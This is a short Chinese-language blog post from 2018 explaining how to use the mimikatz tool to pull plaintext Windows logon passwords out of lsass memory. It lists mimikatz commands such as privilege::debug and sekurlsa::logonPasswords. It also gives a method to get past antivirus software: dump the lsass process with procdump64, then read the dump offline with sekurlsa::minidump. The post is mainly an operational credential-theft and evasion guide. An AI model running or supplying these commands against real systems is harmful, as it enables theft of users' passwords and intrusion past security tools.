mimikatz使用

一.简介

mimikatz是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点也是让阿刚最感兴趣的就是他可以直接从 lsass中获取当前处于Active系统的登录密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而mimikatz正是通过对lsass的逆算获取到明文密码!也就是说只要你不重启电脑,就可以通过他获取到登陆密码,只限当前登陆系统!

二.常用命令

  • cls-----------------------------清屏
  • exit----------------------------退出
  • version------------查看mimikatz的版本
  • system::user-----查看当前登录的系统用户
  • system::computer-------查看计算机名称
  • process::list------------------列出进程
  • process::suspend 进程名称 -----暂停进程
  • process::stop 进程名称---------结束进程
  • process::modules --列出系统的核心模块及所在位置
  • service::list---------------列出系统的服务
  • service::remove-----------移除系统的服务
  • service::start stop 服务名称--启动或停止服务
  • privilege::list---------------列出权限列表
  • privilege::enable--------激活一个或多个权限
  • privilege::debug-----------------提升权限
  • nogpo::cmd------------打开系统的cmd.exe
  • nogpo::regedit -----------打开系统的注册表
  • nogpo::taskmgr-------------打开任务管理器
  • ts::sessions-----------------显示当前的会话
  • ts::processes------显示进程和对应的pid情况等
  • sekurlsa::wdigest-----获取本地用户信息及密码
  • sekurlsa::tspkg------获取tspkg用户信息及密码
  • sekurlsa::logonPasswords--获登陆用户信息及密码

三.使用举例

1.privilege::debug  (提升权限,工具一定要用管理员权限打开,不是管理员的应该先提权)

2.sekurlsa::logonpasswords(获取密码)

四.绕过杀软执行mimikatz的一种方式------导出lsass进程离线读密码

用procdump64或者直接在任务管理器中将lsass文件转存为dmp文件。

procdump64执行的命令:procdump64.exe-accepteula-malsass.exe 1.dmp

然后将文件下载到本地在运行mimikatz。

mimikatz_2.exe "sekurlsa::minidump 1.dmp" "sekurlsa::logonPasswords full" exit

 

posted @ 2018-11-27 18:15  夏末秋至  阅读(1658)  评论(0编辑  收藏  举报